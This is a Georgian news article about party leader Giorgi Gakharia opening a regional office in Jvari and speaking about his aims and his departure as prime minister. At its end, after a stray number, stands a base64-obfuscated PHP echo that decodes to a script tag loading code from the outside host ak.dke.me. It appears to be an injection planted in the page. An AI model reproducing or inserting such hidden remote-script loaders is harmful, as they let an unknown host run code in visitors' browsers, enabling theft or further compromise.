celsiusi
ავერსი შნაიდერი
პარტია „საქართველოსთვის“ ლიდერი გიორგი გახარია რეგიონებში ოფისების გახსნას და მოსახლეობასთან შეხვედრებს განაგრძობს. დღეს გახარიამ​ რეგიონული ორგანიზაცია წალენჯიხის მუნიციპალიტეტის ქალაქ ჯვარში გახსნა და მხარდამჭერებს შეხვდა.
 
გახარიას თქმით, ახალი პარტია ორიენტირებულია არა დაპირებების გაცემაზე, არამედ მათ შესრულებაზე და მის გუნდს საქმის კეთების გამოცდილება აქვს.
 
„ამ ქვეყანაში თუ ვინმე პოლიტიკაში ყოფილა – ხალხს უკვე ყველა დაპირება მისცა და ყველაფერი უკვე დაპირებულია. ჩვენ საქმის ხალხი ვართ, საქმე მიკეთებია ყოველთვის.პირველ რიგში, რაც უნდა გავაკეთოთ – ძლიერი სახელმწიფო უნდა შევქმნათ, რომელმაც მერე გლეხზეც უნდა იზრუნოს, კულტურაზეც უნდა იზრუნოს, აფხაზეთზეც უნდა იზრუნოს და ყველაფერზეც უნდა იზრუნოს. ეს არის ჩვენი მიზანი. ამის გაკეთება გვინდა და ვაკეთებთ ისე, რომ ერთმანეთი კი არ ვლანძღოთ და ცირკი კი არ მოვაწყოთ, ახლა რაც ხდება, არამედ, ღირსეულად, კეთილსინდისიერად და პროფესიონალების მხარდაჭერით სადღაც მივიდეთ“, – ამბობს გახარია.
 
ექსპრემიერმა თანამდებობიდან წასვლის მიზეზზეც ისაუბრა.
 
„ბევრს ლეგიტიმური კითხვა ექნება, რომ იქ არ იყავიო და გაგეკეთებინაო. რაც შესაძლებელი იყო და სადამდეც შესაძლებელი იყო, მანამდე ვაკეთებდი, სადაც შეუძლებელი გახდა,კი წამოვედი“, – ამბობს გახარია.
 
მისივე თქმით, ის აპირებს, ყველას ანახოს, რას ნიშნავს, კეთილსინდისიერად ემსახურო ქვეყანას.
 
„პატარაა ეს ქვეყანა და შესაძლებელია ეს ყველაფერი. უბრალოდ ამას სჭირდება ღირსება, კეთილსინდისიერება და პროფესიონალიზმი და არა ომი ჩხუბი და ლანძღვა – შრომა სჭირდება. ამ ცირკში როდის იყო ვინმეს რამე აუშენებია – ვერ ააშენებ. ამიტომ ჩვენ მოწოდებული ვარ ახლა მაქსიმალურად მოვახდინოთ ძალების მობილიზება ჯერ მუნიციპალურ არჩევნებში, შემდგომ საპარლამენტო არჩევნებში და უბრალოდ, ვანახოთ ყველას, რას ნიშნავს კეთილსინდისიერად ემსახურო ქვეყანას, ხალხს და სახელმწიფოს. ეს გაგვიკეთებია, შეგვიძლია და გავაკეთებთ კიდევაც“, – განაცხადა გახარიამ.
 
 
1624
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");